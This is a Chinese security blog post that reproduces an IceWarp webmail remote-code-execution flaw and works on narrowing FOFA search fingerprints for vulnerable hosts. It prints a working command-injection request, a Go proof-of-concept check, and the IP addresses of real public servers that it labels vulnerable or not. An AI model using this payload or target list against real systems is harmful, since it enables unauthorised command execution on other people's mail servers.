

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="对IceWarp的RCE进行复现，并不断地优化fofa dork语法">
  <meta name="author" content="corp0ra1">
  <meta name="keywords" content="">
  
  <title>IceWarp RCE复现之指纹细化 - corp0ra1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"corp0ra1.cn","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":80,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"a1a4ccab78dfa522556928ac810fa739","google":"G-4X9XV0H0D5","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="corp0ra1's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 60vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
    <div class="container">
        <a class="navbar-brand" href="/">&nbsp;<strong>Corp0ra1's Blog</strong>&nbsp;</a>

        <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

        <!-- Collapsible content -->
        <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav ml-auto text-center">
                
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
                                        </li>
                                        
                                            
                                                
                                                    <li class="nav-item" id="search-btn">
                                                        <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
                                                    </li>
                                                    
                                                        
                                                            <li class="nav-item" id="color-toggle-btn">
                                                                <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
                                                            </li>
                                                            
                                                                <li class="nav-item">
                                                                    <a class="nav-link" href="/atom.xml">
                                                                        <i class="iconfont icon-rss"></i>
                                                                    </a>
                                                                </li>
            </ul>
        </div>
    </div>
</nav>
    <div class="banner" id="banner" parallax=true
         style="background: url('/img/tesla.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="IceWarp RCE复现之指纹细化">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-07-13 00:00" pubdate>
        2021年7月13日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      14
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

    <div class="container-fluid nopadding-x">
        <div class="row nomargin-x">
            <div class="d-none d-lg-block col-lg-2"></div>
            <div class="col-lg-8 nopadding-x-md">
                <div class="container nopadding-x-md" id="board-ctn">
                    <div class="py-5" id="board">
                        <article class="post-content mx-auto">
                            <!-- SEO header -->
                            <h1 style="display: none">
                                IceWarp RCE复现之指纹细化
                            </h1>
                            <div class="markdown-body">
                                <h1 id="IceWarp-RCE复现之指纹细化"><a href="#IceWarp-RCE复现之指纹细化" class="headerlink" title="IceWarp RCE复现之指纹细化"></a>IceWarp RCE复现之指纹细化</h1><h1 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h1><ol>
<li>Twitter上发现黑哥发PR，说IceWarp的设备发现xxx个，以及有对应的pocsuitePOC</li>
<li>在seebug上查找<a target="_blank" rel="noopener" href="https://www.seebug.org/vuldb/ssvid-99280">漏洞的信息</a>，references里面发现新的更早的luck-ying师傅的<a target="_blank" rel="noopener" href="https://github.com/luck-ying/Library-POC/blob/8c41b70411fd55f3abf0acb1504073534391adcb/Goby%26poc/IceWarp_WebClient_basic_RCE.json">POC</a></li>
<li>luck-ying师傅的指纹是<code>“Powered by IceWarp”</code>，以及找到了xray社区有人提交了<a target="_blank" rel="noopener" href="https://github.com/chaitin/xray/pull/1334/commits/61ad6004f631b29dc9c746d4c5dbf4ad6b192f32">POC</a>，也是类似</li>
<li>想要找到漏洞的详细信息，比如漏洞危害，厂商等</li>
<li>找着找着想把POC优化<ol>
<li>通用化，因为icewarp系统可以用linux搭建，而目前的POC仅针对windows的命令执行</li>
<li>指纹感觉有点宽和泛</li>
</ol>
</li>
</ol>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /webmail/basic/ HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">110.49</span><span class="hljs-number">.72</span><span class="hljs-number">.70</span><br>User-Agent: Mozilla/<span class="hljs-number">5.0</span> (Windows NT <span class="hljs-number">10.0</span>; Win64; x64; rv:<span class="hljs-number">89.0</span>) Gecko/<span class="hljs-number">20100101</span> Firefox/<span class="hljs-number">89.0</span><br>Content-Type: application/x-www-form-urlencoded<br>Accept-Encoding: gzip, deflate<br><span class="hljs-attr">Connection</span>: close<br>Upgrade-Insecure-Requests: <span class="hljs-number">1</span><br>Content-Length: <span class="hljs-number">43</span><br><br>_dlg[captcha][target]=system(\<span class="hljs-string">&#x27;ipconfig\&#x27;)\</span><br></code></pre></td></tr></table></figure>

<h1 id="优化"><a href="#优化" class="headerlink" title="优化"></a>优化</h1><h2 id="通用化"><a href="#通用化" class="headerlink" title="通用化"></a>通用化</h2><p>结局失败：因为一开始只打算把POC弄得更通用的，但是实际发现公网unix系统的机器很少，而且也基本不存在漏洞</p>
<p>收获：发现蜜罐，<code>(&quot;Powered by IceWarp&quot; &amp;&amp; os=&quot;unix&quot;) &amp;&amp; (is_honeypot=false &amp;&amp; is_fraud=false)</code></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="指纹优化"><a href="#指纹优化" class="headerlink" title="指纹优化"></a>指纹优化</h2><blockquote>
<p>在找特征的时候时间跨度有点久，中间有其他事情耽搁了，一些站点不尽相同故截图的IP有差异，但是思路内容大概如此</p>
</blockquote>
<ol>
<li>先拿goby打一轮，然后打开漏洞的站点，以及不存在漏洞的站点。大概对比下版本的可能性</li>
<li>分析不存在漏洞站点的源码：<ol>
<li>V3.3.1  ：view-source:<a target="_blank" rel="noopener" href="https://195.39.92.14/webmail/">https://195.39.92.14/webmail/</a></li>
<li>V9.4.2  ：view-source:<a target="_blank" rel="noopener" href="https://77.93.253.138/">https://77.93.253.138/</a></li>
</ol>
</li>
<li>分析存在漏洞站点的源码<ol>
<li>V10.1.1：view-source:<a target="_blank" rel="noopener" href="http://1.34.193.219/webmail/">http://1.34.193.219/webmail/</a>（以此为基准，因为代码相对较少，提取特征更方便也更通用）</li>
<li>V10.0.7：view-source:<a target="_blank" rel="noopener" href="http://58.137.61.219/webmail/">http://58.137.61.219/webmail/</a> （以此为基准，因为代码相对较少，提取特征更方便也更通用）</li>
<li>V10.2.1：view-source:<a target="_blank" rel="noopener" href="http://110.49.72.70/webmail/">http://110.49.72.70/webmail/</a></li>
</ol>
</li>
<li>在源码中寻找特征关键字，满足以下条件<ol>
<li>能够与其他非IceWarp产品进行区分</li>
<li>能够与非漏洞的IceWarp产品进行区分</li>
<li>最大程度的兼顾上两者</li>
</ol>
</li>
<li>不断地尝试，测试，切换指纹</li>
<li>最终在权衡了“不仅要区分其他产品还有区分漏洞产品的基础上”，选择了<code>body=&quot;powered by IceWarp&quot; &amp;&amp; body=&quot;basic&quot;</code><ol>
<li><code>powered by IceWarp</code> ：<ol>
<li>想更换该指纹的原因：感觉只要是IceWap产品都有这个字段，都会被识别。但是不是所有的icewarp产品以及对应版本存在漏洞</li>
</ol>
</li>
<li><code>WebMail Basic</code>: 在代码量相对较少的网站源码中找特征，找到了这个，但是部分存在漏洞的站点不存在该指纹，故放弃。</li>
<li><code>/basic</code> :在代码量相对较少的网站源码中找特征，找到了这个，且就是因为basic目录的未授权导致了这个问题，但是如果按照这个指纹太宽泛了，会找到其他非icewarp的产品</li>
<li><code>……-……-</code> :在代码量相对较少的网站源码中找特征，找到这一特殊路径，但是无法区分漏洞产品和非漏洞产品，故放弃</li>
<li>上述特征进行排列组合测试，看对应的fofa资产数目，发现<code>body=&quot;powered by IceWarp&quot; &amp;&amp; body=&quot;basic&quot;</code>这种组合更好，于是选中</li>
</ol>
</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%201.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%202.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%203.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%204.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%205.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%206.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%207.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="POC优化"><a href="#POC优化" class="headerlink" title="POC优化"></a>POC优化</h3><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs go"><span class="hljs-comment">//生成随机数+对应值MD5值</span><br>checkStr := goutils.RandomHexString(<span class="hljs-number">1</span>)<br>md5CheckStr := fmt.Sprintf(<span class="hljs-string">&quot;%x&quot;</span>, md5.Sum([]<span class="hljs-keyword">byte</span>(checkStr)))<br><span class="hljs-comment">//将随机数传递给服务器做md5运算</span><br>cfg.Data = fmt.Sprintf(<span class="hljs-string">&quot;_dlg[captcha][target]=var_dump(md5(%s))\\&quot;</span>, checkStr)<br><span class="hljs-comment">//check是否包含md5值</span><br>strings.Contains(resp.Utf8Html, md5CheckStr)<br></code></pre></td></tr></table></figure>

<h2 id="其他发现"><a href="#其他发现" class="headerlink" title="其他发现"></a>其他发现</h2><ol>
<li>goby在gui编写POC的时候有个选项：是否跟随跳转</li>
<li>在response来匹配返回内容确定是否存在漏洞的时候，<ol>
<li>如果是302界面，未选择跟随跳转，则匹配302的响应体内容</li>
<li>如果是302界面，跟随跳转，则匹配重定向后的界面内容</li>
<li>如果是200，无论是否跟随跳转都一样。</li>
</ol>
</li>
<li>也就说goby是区分302界面的。</li>
<li>对于fofa而言当中也是，对于302界面只保留302跳转之后</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled.gif" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/IceWarp%20RCE%E5%A4%8D%E7%8E%B0%E4%B9%8B%E6%8C%87%E7%BA%B9%E7%BB%86%E5%8C%96%20597b2c36e3034ab4b70d17238bd6d69d/Untitled%208.png" srcset="/img/loading.gif" lazyload></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>指纹的优化基本失败，原因是一个平衡问题。</p>
<ol>
<li>存在漏洞站点的源代码中可以看出来，能区分iceWarp产品特征的指纹不多，而<code>power by Icewarp</code>能够最大程度的区分iceWarp与其他产品，而其他特征虽然也能区分icewarp与其他产品，但是会产生漏报</li>
<li>虽然可以通过组合特征的方式以提取更精确的指纹，但我目前分析的样本不多，而且评估所要分析很多不同的版本样本所付出的时间成本，不如就<code>power by Icewarp</code> </li>
<li>根据结果，可以发现版本10.0.6&lt;x&lt;10.3.0之间的版本存在漏洞，但基于版本的比对可取性不高，毕竟分析样本少</li>
</ol>

                            </div>
                            
                                <p class="note note-info">
                                    
                                                    本文最后更新于：
                                                        2023年5月12日 晚上
                                                            
                                </p>
                                
                                    <hr>
                                    <div>
                                        <div class="post-metas mb-3">
                                            
                                                <div class="post-meta mr-3">
                                                    <i class="iconfont icon-category"></i>
                                                    
                                                        <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                                                            漏洞复现
                                                        </a>
                                                        
                                                </div>
                                                
                                                    
                                                        <div class="post-meta">
                                                            <i class="iconfont icon-tags"></i>
                                                            
                                                                <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                                                                    漏洞复现
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
                                                                    渗透测试
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/%E6%8C%87%E7%BA%B9%E4%BC%98%E5%8C%96/">
                                                                    指纹优化
                                                                </a>
                                                                
                                                                <a class="hover-with-bg" href="/tags/IceWarp/">
                                                                    IceWarp
                                                                </a>
                                                                
                                                        </div>
                                                        
                                        </div>
                                        
                                            <p class="note note-warning">
                                                
                                                            本博客所有文章欢迎转载 ，但希望转载时能注明出处！ </br>关于文章，如有疑问，欢迎讨论！Email:corp0ra1@qq.com </br>如果图片无法显示:https://corp0ra1.github.io/common/imageLoad.html
                                                                
                                            </p>
                                            
                                                
                                                    <div class="post-prevnext">
                                                        <article class="post-prev col-6">
                                                            
                                                                
                                                                    <a href="/2021/07/18/%5Bnotion%5Drconfig%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                                                                        <i class="iconfont icon-arrowleft"></i>
                                                                        <span class="hidden-mobile">rConfig系列漏洞复现</span>
                                                                        <span class="visible-mobile">上一篇</span>
                                                                    </a>
                                                                    
                                                        </article>
                                                        <article class="post-next col-6">
                                                            
                                                                
                                                                    <a href="/2021/07/05/%5Bnotion%5DSSL%E9%AA%8C%E8%AF%81%E9%97%AE%E9%A2%98/">
                                                                        <span class="hidden-mobile">Git在使用过程中证书校验报错问题</span>
                                                                        <span class="visible-mobile">下一篇</span>
                                                                        <i class="iconfont icon-arrowright"></i>
                                                                    </a>
                                                                    
                                                        </article>
                                                    </div>
                                                    
                                    </div>

                                    
                        </article>
                    </div>
                </div>
            </div>
            
                <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
                    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

                </div>
                
        </div>
    </div>

    <!-- Custom -->
    
    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <div class="copyright">©2020 - 2021 By Corp0ra1</div> </div> <div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> &nbsp;|&nbsp; <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> &nbsp;|&nbsp; <a href="https://github.com/jsdelivr/jsdelivr" target="_blank" rel="nofollow noopener"><span>jsDelivr</span></a> </div> 
  </div>
  <!--添加运行时间-->
<div id="sitetime"></div>
<script language=javascript>
    function siteTime() {
        window.setTimeout("siteTime()", 1000);
        var seconds = 1000;
        var minutes = seconds * 60;
        var hours = minutes * 60;
        var days = hours * 24;
        var years = days * 365;
        var today = new Date();
        var todayYear = today.getFullYear();
        var todayMonth = today.getMonth() + 1;
        var todayDate = today.getDate();
        var todayHour = today.getHours();
        var todayMinute = today.getMinutes();
        var todaySecond = today.getSeconds();
        /* 
      Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
      year - 作为date对象的年份，为4位年份值
      month - 0-11之间的整数，做为date对象的月份
      day - 1-31之间的整数，做为date对象的天数
      hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
      minutes - 0-59之间的整数，做为date对象的分钟数
      seconds - 0-59之间的整数，做为date对象的秒数
      microseconds - 0-999之间的整数，做为date对象的毫秒数
     */
        var t1 = Date.UTC(2021, 05, 01, 00, 00, 00); //北京时间2018-2-13 00:00:00
        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
        var diff = t2 - t1;
        var diffYears = Math.floor(diff / years);
        var diffDays = Math.floor((diff / days) - diffYears * 365);
        var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
        var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) / minutes);
        var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours - diffMinutes * minutes) / seconds);
        document.getElementById("sitetime").innerHTML = "很高兴遇到你，我已经在此等候了你 " + /*diffYears+" 年 "+*/ diffDays + " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
    }
    siteTime();
</script>

    <div class="statistics">
        
            

                
                                                
                                                    <!-- 不蒜子统计PV -->
                                                    <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            
            <span id="busuanzi_value_site_pv"></span>
                                                     次
                                                        &nbsp; <span class="iconfont icon-love"></span></span>
                                                        

                                                            

                                                                <!-- 不蒜子统计UV -->
                                                                <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            
            <span id="busuanzi_value_site_uv"></span>
                                                                 人
                                                                    </span>
                                                                    
                                                                        
    </div>
    
  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        鄂ICP备2022018419号-1
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=46010802001190"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>琼公网安备 46010802001190号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












    
        <!-- Baidu Analytics -->
        <script defer>
            var _hmt = _hmt || [];
            (function() {
                var hm = document.createElement("script");
                hm.src = "https://hm.baidu.com/hm.js?a1a4ccab78dfa522556928ac810fa739";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(hm, s);
            })();
        </script>
        

            
                <!-- Google Analytics -->
                <!-- <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-4X9XV0H0D5', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script> -->
                <!-- Global site tag (gtag.js) - Google Analytics -->
                <script async src="https://www.googletagmanager.com/gtag/js?G-4X9XV0H0D5"></script>
                <script>
                    window.dataLayer = window.dataLayer || [];

                    function gtag() {
                        dataLayer.push(arguments);
                    }
                    gtag('js', new Date());

                    gtag('config', 'G-4X9XV0H0D5');
                </script>
                

                    

                            

                                    

                                            
                                                    



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
